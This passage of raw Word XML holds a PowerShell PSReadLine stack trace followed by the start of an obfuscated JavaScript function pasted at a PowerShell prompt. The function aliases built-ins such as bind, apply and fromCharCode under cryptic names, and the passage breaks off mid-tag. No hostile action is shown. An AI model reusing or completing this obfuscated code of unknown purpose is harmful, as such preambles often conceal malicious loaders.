    <w:p w14:paraId="4004EC58" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.CalculateWhereAndWhatToRender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">(Boolean </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cursorMovedToInitialPos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RenderData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>renderData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LineInfoForRendering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lineInfoForRendering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBC0B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.ReallyRender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RenderData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>renderData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>defaultColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4CF0AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.ForceRender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B98ED7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.Insert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Char c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA982DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.AcceptLineImpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(Boolean validate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0DE09A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.ProcessOneKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PSKeyInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> key, Dictionary`2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dispatchTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Boolean </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ignoreIfNoAction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6E5400" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.InputLoop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19997EF6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">   at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Microsoft.PowerShell.PSConsoleReadLine.ReadLine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Runspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>runspace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EngineIntrinsics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>engineIntrinsics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CancellationToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cancellationToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A859B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4585A93A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109"/>
    <w:p w14:paraId="33B9EC50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>PS C:\Users\JazmyneJosephine Mar&gt; set true (function W(F) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB9585" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     var RO = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17941511" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RU = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F8E97F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     var RQ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36226915" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RV = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61260A17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Re = Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5E0ECB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RY = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="326A2D95" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Rz = Number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E636A92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Rn = String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC3AC8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RL = Array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0567D909" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RW = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Re.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BFDE198" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RR = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Re.call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55C46E51" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RR.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(RW, RR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8FB0E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> U = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Re.apply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18543BEE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RP = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(U)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728BC60A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> p = [].push</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773970C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> u = [].pop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A79784" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> w = [].slice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CA973" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a = [].splice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AD7C69" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> X = [].join</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8ACDF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> k = [].map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0C6674" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> P = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3554B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> A = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(w)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAC007B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> j = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(X)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B2742" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> f = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(k)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143DC7C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> J = {}.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hasOwnProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2125C4A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(J)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F53C30" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B12E644" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> b = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Re.getOwnPropertyDescriptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F18769A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RM = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Re.defineProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="288AB8C1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RB = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rn.fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CDE908A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> t = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Math.min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="315BE277" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Math.floor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D0BAB1A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RN = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Re.create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33AFBCF1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> O = "".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexOf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77F041BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> r = "".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5716E7D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> T = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C930CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Rx = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
